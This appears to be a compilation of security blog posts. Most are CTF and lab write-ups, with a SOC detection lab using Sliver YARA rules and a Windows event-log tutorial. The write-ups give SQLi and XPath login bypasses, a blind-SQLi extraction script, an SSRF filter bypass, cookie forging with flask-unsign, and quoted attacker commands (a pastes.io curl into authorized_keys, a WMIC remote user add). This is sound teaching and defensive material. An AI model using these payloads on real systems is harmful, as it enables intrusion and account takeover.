This is just an example of a process that may indicate suspicious activity on a system\nThen we craft an Response rule:\nThis rule will terminate the parent process when it is detected.\n1 2 3 4 5 6 - action: report name: vss_deletion_kill_it - action: task command: - deny_tree - \u0026lt;\u0026lt;routing/parent\u0026gt;\u0026gt; This hung shell is an indication that it worked succesfully\nTuning False Positives Here we craft a false positive detection rule. This is whereby we can prevent alerts when normal system processes are run, thus causing alot of noise.\nI crafted to detect when whoami.exe is run. This is just an example.\n1 2 3 4 5 6 7 8 9 10 11 op: and rules: - op : is path: cat value: Whoami Utility Execution - op: is path: detect/event/FILE_PATH value: C:\\Windows\\system32\\whoami.exe - op: is path: detect/event/COMMAND_LINE value: \u0026#39;\u0026#34;C:\\Windows\\system32\\whoami.exe\u0026#34;\u0026#39; After testing it:\nIt works!!\nIf i run whoami when the rule is enabled i get no alaert, however whn i disable it i get an alert.\nAutomated Yara Scanning 1 2 YARA is a tool primarily used for identifying and classifying malware based on textual or binary patterns. It allows researchers and security professionals to craft rules that describe unique characteristics of specific malware families or malicious behaviors. There are well crafted rules for sliver (our c2 server) on the internet. 
We will use this \u0026raquo; here\n1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 ule sliver_github_file_paths_function_names { meta: author = \u0026#34;NCSC UK\u0026#34; description = \u0026#34;Detects Sliver Windows and Linux implants based on paths and function names within the binary\u0026#34; strings: $p1 = \u0026#34;/sliver/\u0026#34; $p2 = \u0026#34;sliverpb.\u0026#34; $fn1 = \u0026#34;RevToSelfReq\u0026#34; $fn2 = \u0026#34;ScreenshotReq\u0026#34; $fn3 = \u0026#34;IfconfigReq\u0026#34; $fn4 = \u0026#34;SideloadReq\u0026#34; $fn5 = \u0026#34;InvokeMigrateReq\u0026#34; $fn6 = \u0026#34;KillSessionReq\u0026#34; $fn7 = \u0026#34;ImpersonateReq\u0026#34; $fn8 = \u0026#34;NamedPipesReq\u0026#34; condition: (uint32(0) == 0x464C457F or (uint16(0) == 0x5A4D and uint16(uint32(0x3c)) == 0x4550)) and (all of ($p*) or 3 of ($fn*)) } rule sliver_proxy_isNotFound_retn_cmp_uniq { meta: author = \u0026#34;NCSC UK\u0026#34; description = \u0026#34;Detects Sliver implant framework based on some unique CMPs within the Proxy isNotFound function. False positives may occur\u0026#34; strings: $ = {C644241800C381F9B3B5E9B2} $ = {8B481081F90CAED682} condition: (uint32(0) == 0x464C457F or (uint16(0) == 0x5A4D and uint16(uint32(0x3c)) == 0x4550)) and all of them } rule sliver_nextCCServer_calcs { meta: author = \u0026#34;NCSC UK\u0026#34; description = \u0026#34;Detects Sliver implant framework based on instructions from the nextCCServer function. 
False positives may occur\u0026#34; strings: $ = {4889D3489948F7F94839CA????48C1E204488B0413488B4C1308} condition: (uint32(0) == 0x464C457F or (uint16(0) == 0x5A4D and uint16(uint32(0x3c)) == 0x4550)) and all of them } We will also need a rule to detect when yara is matched.\n1 2 3 4 5 6 7 8 event: YARA_DETECTION op: and rules: - not: true op: exists path: event/PROCESS/* - op: exists path: event/RULE_NAME From here we can create rules to automatically scan new executables and those in the downloads directory.\nWith this we can uleash the full power of the EDR to scan and detect malicious processes and files\nUntil next time!! HACK THE PLANET\n","date":"2024-02-06T15:57:25+03:00","image":"https://f0rk3b0mb.github.io/cover/soc_lab.jpg","permalink":"https://f0rk3b0mb.github.io/p/soc_analyst_lab/","title":"Soc_analyst_lab"},{"content":"Writeup for challenges in knightctf 2024\nweb kitty Tetanus is a serious, potentially life-threatening infection that can be transmitted by an animal bite.\nN:B: There is no need to do bruteforce.\nHere its obvious that it is sqli , login bypas to be precise\n1 payload: \u0026#34; or 1=1-- - since it was in json we you had to excape the first double-quote\nREADME This challenge entailed bypass a 403 response to be able to read the flag. The methos to exploit this is by using special http headers. see here\nUsing burp intruder , we get the flag\nGain access 1 For this challenge we are given a login page. It obvious the vuln is login bypass.\nInspecting the page source code we can see a comment with the root email \u0026ldquo;root@knightctf.com\u0026rdquo;\n1 payload : root@knightctf.com\u0026#39;-- - Gain access 2 For this challnege we are also given a login page. Viewing the page source we can see a comment that indicated there is a path notesssssss.txt. Visiting it\u0026hellip;\n1 2 I\u0026#39;ve something for you. Think..... root@knightctf.com:d05fcd90ca236d294384abd00ca98a2d The hash is md5 since it has a length of 32. 
Using this \u0026raquo; site we find the password as \u0026ldquo;letmein_kctf2024\u0026rdquo;\nLogging in we get a OTP verification page. It is vulnerable to sqli\n1 payload : anything\u0026#39; or 1=1-- - We then get access to the dashboard\nI got stuck here , will update when the ctf ends. :)\nUpdate:\nAfter you get the password , there is ana OTP page . The page also has an option to resend otp which requires you to enter an email. If we eneter the email roor@knightctf.com. That we had earlier we can see that it accepts it. Note: I had tries this methos earlier but i used the wrong format.\nSo you can send several email as an array []\n1 2 3 4 { \u0026#34;email\u0026#34;: [\u0026#34;root@knightctf.com\u0026#34;,\u0026#34;attacker@email.com\u0026#34;] } This will send the OTP code to both emails. Using the OTP code we get the flag\nCREDIT: @T3l3sc0p3\nNetworking For the networking challs check out my teammates writeups on them \u0026raquo;\nhere ","date":"2024-01-20T22:14:59+03:00","image":"https://f0rk3b0mb.github.io/cover/knightctf.jpg","permalink":"https://f0rk3b0mb.github.io/p/knightctf_2024/","title":"Knightctf_2024"},{"content":"Whats my password solve script category : web difficulty: easy\nVulnerability is error based blind sqli\n1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 import requests import string import json url=\u0026#34;http://whats-my-password-web.chal.irisc.tf/api/login\u0026#34; #found_char=[\u0026#39;i\u0026#39;, \u0026#39;r\u0026#39;, \u0026#39;i\u0026#39;, \u0026#39;s\u0026#39;, \u0026#39;c\u0026#39;, \u0026#39;t\u0026#39;, \u0026#39;f\u0026#39;, \u0026#39;{\u0026#39;, \u0026#39;m\u0026#39;, \u0026#39;y\u0026#39;, \u0026#39;_\u0026#39;, \u0026#39;p\u0026#39;, \u0026#39;4\u0026#39;, \u0026#39;2\u0026#39;, \u0026#39;2\u0026#39;,\u0026#39;W\u0026#39;, \u0026#39;0\u0026#39;, \u0026#39;R\u0026#39;, \u0026#39;D\u0026#39;, \u0026#39;_\u0026#39;, \u0026#39;1\u0026#39;, \u0026#39;S\u0026#39;, \u0026#39;_\u0026#39;, 
\u0026#39;S\u0026#39;, \u0026#39;Q\u0026#39;, \u0026#39;l\u0026#39;, \u0026#39;1\u0026#39;,\u0026#39;}\u0026#39;] found_char=[] headers={\u0026#34;Content-Type\u0026#34;:\u0026#34;application/json\u0026#34;} def main(): for x in range(len(found_char),50): for i in string.printable[:-6]: username = \u0026#34;skat\u0026#34; password = f\u0026#34;\\\u0026#34; or 1=(IF(SUBSTR((SELECT password from users where username=\u0026#39;skat\u0026#39;),{x},1)=\u0026#39;{i}\u0026#39;, 1,2))-- -\u0026#34; data = {\u0026#34;username\u0026#34;: username, \u0026#34;password\u0026#34;: password} sdata=json.dumps(data) r=requests.post(url,data=sdata,headers=headers) if \u0026#34;root\u0026#34; in r.text: found_char.append(i) print(found_char) break main() flag: irisctf{my_p422W0RD_1S_SQl1} ","date":"2024-01-06T18:29:32+03:00","image":"https://f0rk3b0mb.github.io/cover/iris.png","permalink":"https://f0rk3b0mb.github.io/p/irisctf_whats_my_password/","title":"Irisctf_whats_my_password"},{"content":"Writeup of htb sherlock Meerkat rating: easy\nWe believe our Business Management Platform server has been compromised. Please can you confirm the name of the application running? we can filter the meerkat-alerts.json with\u0026hellip;\n1 2 3 4 cat meerkat-alerts.json |jq |grep signature | grep -v python the bmp name is in the signature ans: Bonitasoft\nWe believe the attacker may have used a subset of the brute forcing attack category - what is the name of the attack carried out? From the meerkat-alerts.json and from pacap file we can see that there was alot of alerts on python-requests and we can see the requests tested different creds. This is possible Credential Stuffing\nans: Credential Stuffing\nDoes the vulnerability exploited have a CVE assigned - and if so, which one? Here use the same command as question1 , the cve is in the signature\nans: CVE-2022-25237\nWhich string was appended to the API URL path to bypass the authorization filter by the attacker\u0026rsquo;s exploit? 
in this case i used tshark to analyse the pcap.\n1 2 3 4 tshark -r meerkat.pcap -Y \u0026#34;http.request.method == POST\u0026#34; -T fields -e http.request.uri | grep -i api filter post requests , get the url path and grep for the api endpoints i18ntranslation\nHow many combinations of usernames and passwords were used in the credential stuffing attack? here we filter post requests, the we remove \u0026ldquo;username=install\u0026amp;password=install\u0026amp;_l=en\u0026rdquo; , i also removed \u0026ldquo;/bonita/API/portal/page/;i18ntranslation\u0026rdquo; and \u0026ldquo;/bonita/API/pageUpload;i18ntranslation?action=add\u0026rdquo; which were not login requests then pipe the output to uniq\n1 2 tshark -r meerkat.pcap -Y \u0026#34;http.request.method == POST\u0026#34; -T fields -e http.request.uri -e http.file_data | grep -v \u0026#34;username=install\u0026amp;password=install\u0026amp;_l=en\u0026#34; | grep -v \u0026#34;/bonita/API/portal/page/;i18ntranslation\u0026#34; | grep -v \u0026#34;/bonita/API/pageUpload;i18ntranslation?action=add\u0026#34; | uniq | wc -l ans: 56\nWhich username and password combination was successful? From the query above without uniq , the last combination has a different http.file_data , yoll have to check through wireshark but the ans is \u0026hellip;\nans: seb.broom@forela.co.uk:g0vernm3nt\nIf any, which text sharing site did the attacker utilise? As i was analysing the pcap using this query we can get the full uri. the url is part of parameters\n1 tshark -r meerkat.pcap -T fields -e http.request.full_uri | uniq ans: pastes.io\nPlease provide the filename of the public key used by the attacker to gain persistence on our host. 
Visiting the url we get a bash script with the following content\u0026hellip; hxxps[://]pastes[.]io/raw/bx5gcr0et8\n1 2 3 #!/bin/bash curl https://pastes.io/raw/hffgra4unv \u0026gt;\u0026gt; /home/ubuntu/.ssh/authorized_keys sudo service ssh restart ans: hffgra4unv\nCan you confirmed the file modified by the attacker to gain persistence? see above\nans: /home/ubuntu/.ssh/authorized_keys\nCan you confirm the MITRE technique ID of this type of persistence mechanism? this technique of using ssh authorized keys has id T1098.004. You can get this by visiting mitre website or googling or use chatgpt idc.\nans: T1098.004\n","date":"2023-12-20T14:43:14+03:00","permalink":"https://f0rk3b0mb.github.io/p/htb-sherlock-meerkat/","title":"Htb Sherlock Meerkat"},{"content":"Thm Investigating with splunk This room is for pactice on the Jnuior Penetration tester path on TryHackMe \u0026raquo;\u0026gt; here\nHow many events were collected and Ingested in the index main? 1 2 3 index=\u0026#34;main\u0026#34; ans: 12256 On one of the infected hosts, the adversary was successful in creating a backdoor user. What is the new username? 1 2 3 index=main EventID=\u0026#34;4720\u0026#34; ans: A1berto On the same host, a registry key was also updated regarding the new backdoor user. What is the full path of that registry key? 1 2 3 4 index=main Hostname=\u0026#34;Micheal.Beaven\u0026#34; EventID=\u0026#34;12\u0026#34; A1berto ans : HKLM\\SAM\\SAM\\Domains\\Account\\Users\\Names\\A1berto Examine the logs and identify the user that the adversary was trying to impersonate. 1 2 3 4 5 6 7 The attacker account is called A1berto the real account is Alberto with an \u0026#39;L\u0026#39; index=main (User section) ans : Alberto What is the command used to add a backdoor user from a remote computer? 
1 2 3 4 index=main EventID=\u0026#34;4688\u0026#34; ans: \u0026#34;C:\\windows\\System32\\Wbem\\WMIC.exe\u0026#34; /node:WORKSTATION6 process call create \u0026#34;net user /add A1berto paw0rd1\u0026#34; How many times was the login attempt from the backdoor user observed during the investigation? 1 2 3 4 5 6 index=main EventID=\u0026#34;4624\u0026#34; \u0026lt;\u0026lt; succesful logon\u0026gt;\u0026gt; index=main EventID=\u0026#34;4625\u0026#34; \u0026lt;\u0026lt;unsuccesful logon\u0026gt;\u0026gt; both return no results ans : 0 What is the name of the infected host on which suspicious Powershell commands were executed? 1 2 3 index=main powershell ans : James.browne PowerShell logging is enabled on this device. How many events were logged for the malicious PowerShell execution? 1 2 3 index=main EventID=\u0026#34;4103\u0026#34; ans: 79 An encoded Powershell script from the infected host initiated a web request. What is the full URL? 1 2 3 4 5 6 from question 7 check the first event base64 decode and use decode text utf-16le using cyberchef. The url is base64 encoded . Youll also have to defang the url ans: hxxp[://]10[.]10[.]10[.]5/news[.]php ","date":"2023-12-03T11:56:27+03:00","image":"https://f0rk3b0mb.github.io/cover/thm.svg","permalink":"https://f0rk3b0mb.github.io/p/thm_splunk/","title":"Thm_splunk"},{"content":"Wazuh This is a writeup of Wazuh module on tryhackme. This is in the SOC Level 1 path. \u0026raquo; here ENjoy :)\nWazuh is an opensource XDR and SIEM service\nIntro 1 2 3 4 5 6 7 8 9 10 11 12 13 1. When was Wazuh released? 2015 2. What is the term that Wazuh calls a device that is being monitored for suspicious activity and potential security threats? agent 3. Lastly, what is the term for a device that is responsible for managing these devices? manager Wazuh agents 1 2 3 4 5 6 7 8 9 1. How many agents does this Wazuh management server manage? 2 2. What are the status of the agents managed by this Wazuh management server? 
disconnected Wazuh Vulnerability Assessment \u0026amp; Security Events 1 2 3 4 1. How many \u0026#34;Security Event\u0026#34; alerts have been generated by the agent \u0026#34;AGENT-001\u0026#34;? 196 Collecting Windows Logs with Wazuh 1 2 3 4 5 6 7 8 9 1. What is the name of the tool that we can use to monitor system events? sysmon 2. What standard application on Windows do these system events get recorded to? event viewer Collecting Linux Logs with Wazuh 1 2 3 4 1. What is the full file path to the rules located on a Wazuh management server? /var/ossec/ruleset/rules Auditing Commands on Linux with Wazuh 1 2 3 4 5 6 7 8 9 1. What application do we use on Linux to monitor events such as command execution? auditd 2. What is the full path \u0026amp; filename for where the aforementioned application stores rules? /etc/audit/ruled.d/audit.rules Wazuh API 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 1. What is the name of the standard Linux tool that we can use to make requests to the Wazuh management server? curl 2. What HTTP method would we use to retrieve information for a Wazuh management server API? GET 3. What HTTP method would we use to perform an action on a Wazuh management server API? PUT 4. Use the API console to find the Wazuh server\u0026#39;s version. v4.2.5 Generating Reports with Wazuh 1 2 3 4 1. Analyse the report. What is the name of the agent that has generated the most alerts? 
agent-001 ","date":"2023-11-25T08:48:38+03:00","image":"https://f0rk3b0mb.github.io/cover/thm.svg","permalink":"https://f0rk3b0mb.github.io/p/thm_wazuh/","title":"Thm_wazuh"},{"content":"Hackthebox - Hack the boo 2023 writeup HauntMart Category: web Rating: Easy\nThis challenge had a downloadable part , it was a web applicatio that allowed a user to register and login and add a product.\nTo get the flag we have to login as admin.\nThe is a /addAdmin route but it only accepts requests from localhost\n1 2 3 4 5 6 7 8 9 10 11 12 13 14 @api.route(\u0026#39;/addAdmin\u0026#39;, methods=[\u0026#39;GET\u0026#39;]) @isFromLocalhost def addAdmin(): username = request.args.get(\u0026#39;username\u0026#39;) if not username: return response(\u0026#39;Invalid username\u0026#39;), 400 result = makeUserAdmin(username) if result: return response(\u0026#39;User updated!\u0026#39;) return response(\u0026#39;Invalid username\u0026#39;), 400 I Tries using X-Forwarded-For headers but it didnt work.\nIf you look closer at the code there is a function to send a request to fetch the manual from a url.\nThis vulnerability is called ssrf (server side request forgery) check more \u0026raquo;\u0026gt; here\n1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 def downloadManual(url): safeUrl = isSafeUrl(url) if safeUrl: try: local_filename = url.split(\u0026#34;/\u0026#34;)[-1] r = requests.get(url) with open(f\u0026#34;/opt/manualFiles/{local_filename}\u0026#34;, \u0026#34;wb\u0026#34;) as f: for chunk in r.iter_content(chunk_size=1024): if chunk: f.write(chunk) return True except: return False return False There is also a poor attempt of a filter for the url\n1 2 3 4 5 6 7 8 9 blocked_host = [\u0026#34;127.0.0.1\u0026#34;, \u0026#34;localhost\u0026#34;, \u0026#34;0.0.0.0\u0026#34;] def isSafeUrl(url): for hosts in blocked_host: if hosts in url: return False return True We can easily bypass this , there are many routed to localhost other that the ones listed there. 
You can check them out \u0026raquo;\u0026gt; here\nFor me this one worked:\nNOTE: you can get the port that the app is listenig from in therun.py , we have to make a request to /api/addAdmin to make our user admin\n1 2 http://127.0.1.3:1337/api/addAdmin?username=test We get the flag as : HTB{A11_55RF_5C4rY_p4tch_3m_411!}\n","date":"2023-10-27T08:52:15+03:00","image":"https://f0rk3b0mb.github.io/cover/htb.svg","permalink":"https://f0rk3b0mb.github.io/p/hack_the_boo2023/","title":"Hack_the_boo2023"},{"content":"Thm owasp Command Injection Practical 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 What strange text file is in the website root directory? cmd: ls drpepper.txt How many non-root/non-service/non-daemon users are there? What user is this app running as? cmd: whoami www-data What is the user\u0026#39;s shell set as? What version of Ubuntu is running? cmd: lsb_release -a 18.04.4 Print out the MOTD. What favorite beverage is shown? cmd: cat /etc/update-motd.d/00-header DR PEPPER Broken Authentication Practical 1 2 3 4 5 6 7 8 9 10 11 12 What is the flag that you found in darren\u0026#39;s account? fe86079416a21a3c99937fea8874b667 What is the flag that you found in arthur\u0026#39;s account? d9ac0f7db4fda460ac3edeb75d75e16e Sensitive Data Exposure 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 What is the name of the mentioned directory? /assets Navigate to the directory you found in question one. What file stands out as being likely to contain sensitive data? webapp.db Use the supporting material to access the sensitive data. What is the password hash of the admin user? 6eea9b7ef19179a06954edd0f6c05ceb Crack the hash. What is the admin\u0026#39;s plaintext password? qwertyuiop Login as the admin. What is the flag? 
THM{Yzc2YjdkMjE5N2VjMzNhOTE3NjdiMjdl} XML External Entity 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 What is the name of the user in /etc/passwd falcon Where is falcon\u0026#39;s SSH key located? /home/falcon/.ssh/id_rsa What are the first 18 characters for falcon\u0026#39;s private key MIIEogIBAAKCAQEA7b Broken Access Control (IDOR Challenge) 1 2 3 4 5 6 7 8 9 10 Look at other users notes. What is the flag? payload : http://10.10.145.127/note.php?note=0 flag{fivefourthree} Security Misconfiguration 1 2 3 4 5 6 7 8 Hack into the webapp, and find the flag! creds: pensive:PensiveNotes thm{4b9513968fd564a87b28aa1f9d672e17} XSS 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 Navigate to http://10.10.98.36/ in your browser and click on the \u0026#34;Reflected XSS\u0026#34; tab on the navbar; craft a reflected XSS payload that will cause a popup saying \u0026#34;Hello\u0026#34;. ThereIsMoreToXSSThanYouThink On the same reflective page, craft a reflected XSS payload that will cause a popup with your machines IP address. ReflectiveXss4TheWin Then add a comment and see if you can insert some of your own HTML. HTML_T4gs On the same page, create an alert popup box appear on the page with your document cookies. W3LL_D0N3_LVL2 Change \u0026#34;XSS Playground\u0026#34; to \u0026#34;I am a hacker\u0026#34; by adding a comment and using Javascript. websites_can_be_easily_defaced_with_xss Insecure Deserialization 1 2 3 4 5 6 7 8 9 10 Who developed the Tomcat application? The Apache Software Foundation What type of attack that crashes services can be performed with insecure deserialization? 
denial of service Insecure Desirialization 1 2 3 4 5 6 7 8 9 10 11 1st flag (cookie value) THM{good_old_base64_huh} 2nd flag (admin dashboard) THM{heres_the_admin_flag} Insecure Deserialization - Code Execution 1 2 3 4 5 6 flag.txt 4a69a7ff9fd68 Components with know vulns 1 2 3 4 5 6 7 How many characters are in /etc/passwd (use wc -c /etc/passwd to get the answer) exploit : https://www.exploit-db.com/exploits/47887 1611 Insufficient Logging and Monitoring 1 2 3 4 5 6 7 8 9 10 What IP address is the attacker using? 49.99.13.16 What kind of attack is being carried out? brute force ","date":"2023-10-25T13:12:22+03:00","image":"https://f0rk3b0mb.github.io/cover/thm.svg","permalink":"https://f0rk3b0mb.github.io/p/thm_owasp/","title":"Thm_owasp"},{"content":"Blackhat Mea 2023 ctf writeup We participated this ctf as Chasing X fr334aks X L3v3l 6 and managed to get pos 178. It wasn\u0026rsquo;t easy. I Managed to solve the web challenge below.\nAuthy For this challenge we are provided with an api endpoint and challenge source\nAccording to the LoginController.go file we can create a user and login , the user password length should not be less than 6\nThe vulnerability occurs when the user passowrd value in the registration function is not the one being compared in the login function. 
To get the flag we have to login with a password of length \u0026lt; 6.\nThe vulnerable code:\n1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 //registration if len(user.Password) \u0026lt; 6 { log.Error(\u0026#34;Password too short\u0026#34;) resp := c.JSON(http.StatusConflict, helper.ErrorLog(http.StatusConflict, \u0026#34;Password too short\u0026#34;, \u0026#34;EXT_REF\u0026#34;)) return resp } //login if len(password) \u0026lt; 6 { flag := os.Getenv(\u0026#34;FLAG\u0026#34;) res := \u0026amp;Flag{ Flag: flag, } resp := c.JSON(http.StatusOK, res) log.Info() return resp } With my vast ctf experience i could tell what i needed to do :)\nTHe logic is :\n1 2 3 4 5 user.Name := \u0026#34;😃\u0026#34; // Contains 1 emoji character lengthOfString := len(user.Name) // Length of the string (bytes) - 4 (UTF-8 encoding) lengthOfRuneSlice := len([]rune(user.Name)) // Length of rune slice (code points) - 1 So i sent the request for registration with the password as two smileys and login with the same password. 
In the backend the register will see a length of 8 and login will see a length of 2 thus solving the challenge\n1 2 3 4 5 curl -X POST -H \u0026#34;Content-Type: application/json\u0026#34; -d \u0026#39;{\u0026#34;Username\u0026#34;: \u0026#34;ping\u0026#34;, \u0026#34;Password\u0026#34;: \u0026#34;🤣🤣\u0026#34;, \u0026#34;Firstname\u0026#34;: \u0026#34;John\u0026#34;, \u0026#34;Lastname\u0026#34;: \u0026#34;Doe\u0026#34;}\u0026#39; http://af78671fe39ff1e0e18d2.playat.flagyard.com/registration curl -X POST -H \u0026#34;Content-Type: application/json\u0026#34; -d \u0026#39;{\u0026#34;Username\u0026#34;: \u0026#34;ping\u0026#34;, \u0026#34;Password\u0026#34;: \u0026#34;🤣🤣\u0026#34;}\u0026#39; http://af78671fe39ff1e0e18d2.playat.flagyard.com/login The ctf was great and see you in the next one\n","date":"2023-10-09T16:06:15+03:00","image":"https://f0rk3b0mb.github.io/cover/bh.png","permalink":"https://f0rk3b0mb.github.io/p/blackhat_mea_2023/","title":"Blackhat_mea_2023"},{"content":"Shehacks intervasity ctf 2023 This ctf onsite at usiu , nairobi . I particpated online.\nweb category\nGraph1 This was an easy chalenge that tested knowledge in graphql queries\nthe graphql endpoint was located at /graphql.\nfor more info on how to enumerate graphql \u0026raquo; here\nSo basicaly if we send the query below we get introspection on the grapql endpoint\n1 {__schema{types{name,fields{name}}}} You can then use \u0026raquo; here to visualize the schema\nremember to set the content-type to \u0026ldquo;appication/graphql\u0026rdquo; when sending the request\nFrom this we find out that there is a field known as getFlag. We can then run the query below to get the flag . 
It was base64 encoded , so we decode it to get the flag\nX marks the spot In this challenge we are given a web application login field , i tried sql injection at first an an error was thrown\n1 SimpleXMLElement::xpath(): Invalid predicate in \u0026lt;b\u0026gt;/var/www/html/backend.php This indicated that the appication is vulnerable to xpath injection\nyou can check the payloads \u0026raquo; hacktricks xpath\ni tried the payload\n1 \u0026#39;or 1=1 or\u0026#39; this is able to bypass login and i get the result\n1 {\u0026#34;username\u0026#34;:\u0026#34;admin\u0026#34;,\u0026#34;password\u0026#34;:\u0026#34;supersecret\u0026#34;,\u0026#34;api-key\u0026#34;:\u0026#34;api-admin-key\u0026#34;} to move laterally through accounts i used the following payload , i achieved this after after trying lots of payloads\n1 \u0026#39;or position()=3 or\u0026#39; by changing the number above we can basically login as different users , in this case 3 gets us the flag.\nPS i got first blood on this challenge :)\n1 {\u0026#34;username\u0026#34;:\u0026#34;ali\u0026#34;,\u0026#34;password\u0026#34;:\u0026#34;654321\u0026#34;,\u0026#34;api-key\u0026#34;:\u0026#34;flag{s0m30n3_n33ds_1npu7_v4l1d4t10n}\u0026#34;} secrets For this challenge you are provided with a signin page and you can also register.\nWe have to manipulate the cookie to become the admin user. 
For this i used the tool flask-unsign , you can get it \u0026raquo; here\n1 2 3 flask-unsign --decode --cookie \u0026#34;.eJwljkFOBDEMBP-SM4fYjuN4PzOKYxtWiAHN7J4Qf2cQx26pSvVdtjzifCu3x_GMl7LdvdwKyJKcbQnKyJARCmralZw6kPrsiDrYxnSBmQ0SclBMrk5cRyUF55qcuRb2RSbDZGkjTsLBfXpQY21iyd2hUiYahseQBp2tXCHPM47_GuJrr_PI7fH5Hvv1rOE4Wpi4IjjMqmJx1UX1XqtPNKsa2C7uT7PPj7ior_v-Wn5-AZmVRW0.ZQ5wGQ.2gLkeklbQ2OS2GBjMTAi2uiVKWI\u0026#34; {\u0026#39;_fresh\u0026#39;: True, \u0026#39;_id\u0026#39;: \u0026#39;17c7fa4c7278fe78e919b9693d36139da622985b8ad71af41f1f83ea50d35080391d50f5ffcc26c3b78b7c9435f32856ade345947bf56d103ff2b2ede874165b\u0026#39;, \u0026#39;_user_id\u0026#39;: \u0026#39;35\u0026#39;, \u0026#39;csrf_token\u0026#39;: \u0026#39;c8d284eb7d921d1a097be93de0d600da2bb09e24\u0026#39;, \u0026#39;username\u0026#39;: \u0026#39;ping\u0026#39;} We then have to change the uid to 1 and username to admin and then sign the cookie with secretkey \u0026lsquo;SheHacks\u0026rsquo;\n1 2 3 4 flask-unsign --sign --cookie \u0026#34;{ \u0026#39;_user_id\u0026#39;: \u0026#39;1\u0026#39;, \u0026#39;username\u0026#39;: \u0026#39;admin\u0026#39;}\u0026#34; --secret \u0026#39;SheHacks\u0026#39; eyJfdXNlcl9pZCI6IjEiLCJ1c2VybmFtZSI6ImFkbWluIn0.ZQ59CA.CUKCpa3SPstLemcqmuEDrSqmpFI Using this cookie we can get the flag : flag{s3c3ts_4re_n0_l0ng3r_s4f3}\nforensics category\nSnifferDog1 How many packets in total passed through port 445 shctf{Ans}\nFor this we just use the filter \u0026ldquo;tcp.port == 445\u0026rdquo; then check the bottom right of wireshrk for number of packets shctf{10223}\nSniffer Dog2 What is the 6th disallowed item listed in http://192.168.56.103:8081/robots.txt?\nFor this we just use the filter \u0026ldquo;ip.addr == 192.168.56.103 \u0026amp;\u0026amp; tcp.port == 8081 \u0026amp;\u0026amp; http\u0026rdquo; then find \u0026ldquo;robots.txt\u0026rdquo;\nshctf{installation}\nSnifferDog3 What version of Jenkins is running on 192.168.56.103? 
shctf{VersionOnly}\nFor this we just use the filter \u0026ldquo;ip.addr == 192.168.56.103\u0026rdquo; then find \u0026ldquo;jenkins\u0026rdquo;\nshctf{1.647}\nSnifferDog4 What is the domain SID for 192.168.56.103 shctf{S\u0026hellip;}\nFor this we just use the filter \u0026ldquo;ip.addr == 192.168.56.103\u0026rdquo; then find \u0026ldquo;S-1-5\u0026rdquo; this is the format for sid you can learn more \u0026raquo; here\nshctf{S-1-5-21-2950693484-2233299975-203034155}\n","date":"2023-09-22T14:29:32+03:00","image":"https://f0rk3b0mb.github.io/cover/shehacks.png","permalink":"https://f0rk3b0mb.github.io/p/shehacks_intrervasity_2023/","title":"Shehacks_intrervasity_2023"},{"content":"Windows event log analysis is an important skill in threat hunting. These logs silently record system events, security incidents, and user interactions, providing crucial insights into system health and security. In this blog, we will explore the art of Windows Event Log analysis\nIm going to discuss log analysis of windows events in linux, we will be utilizing a tool called chainsaw, you can get it \u0026raquo; here.\nIn this tutorial i will be analysing the files from cybertalents blue scholarship.\n1. chainsaw search an attacker after compromising the machine added a new account as admin. can you find the name of the new account? flag format : flag{md5 of string}\nfile \u0026raquo;\u0026raquo; ex1\nIn windows, each event has a unique event id. So we have to find event id for account creation , a quick google search\nThen in chainsaw\n1 2 ./chainsaw/chainsaw-gnu search -t \u0026#39;Event.System.EventID: =4720\u0026#39; Security436509324654726509.evtx Here we can filter events with the event id 4720.\nSAM means security account manager , it is a database that stores accounts on windows systems. Usename is sam md5hash ba0e0cde1bf72c28d435c89a66afc61a.\nflag{ba0e0cde1bf72c28d435c89a66afc61a}\n2. 
chainsaw hunt file \u0026raquo;\u0026raquo; here\n1 2 3 4 5 6 7 Our network got compromised two days ago by an unknown attacker, and we need to get an answer for the following questions: 1. What is the domain\u0026#39;s SID? 2. The attacker failed to login to some accounts, What is the attacker\u0026#39;s machine IP address? 3. What is the workstation\u0026#39;s name that the attacker was using to authenticate with the administrator account? Flag format: Flag{ANS1_ANS2_ANS3} Since this is account failed login it has event id 4776 for failed login from domain controller. The domain controller in this case is HYDRA-DC.MARVEL.local.\nSince chainsaw has rules to detect certain events , you can use the folowing command to hunt for events\n1 2 ./chainsaw/chainsaw-gnu hunt -r ./chainsaw/rules/ logs.evtx This returns alot of output , but retuns events in a format we can easily comprehend.\n1 2 ./chainsaw/chainsaw-gnu hunt --sigma ./chainsaw/sigma/ --mapping ./chainsaw/mappings/sigma-event-logs-all.yml -r ./chainsaw/rules/lateral_movement/ logs/ You can use the command above to get more info. Now here is where the fun begins.\nFrom the logs we can see that there are several users lke pbarker,fcasle, Administrator and these avents are have a common ipaddress \u0026ldquo;192.168.80.128\u0026rdquo;\nIf we search for the following users in the sigma output , we can find the sid\npbarker : S-1-5-21-271597537-2992796785-3713134209-1105\nfcastle: S-1-5-21-271597537-2992796785-3713134209-1103\nAdminitrator : S-1-5-21-271597537-2992796785-3713134209-500\nThe structure of an sid is as follows :\nS-1-5-21--\u0026lt;relative_id\u0026gt;\nWhere:\nS: A constant prefix indicating that it is a Security Identifier.\n1: Revision number (currently always 1).\n5: Identifier authority value (the identifier authority for Windows is always 5).\n21: The identifier authority\u0026rsquo;s top-level domain identifier. 
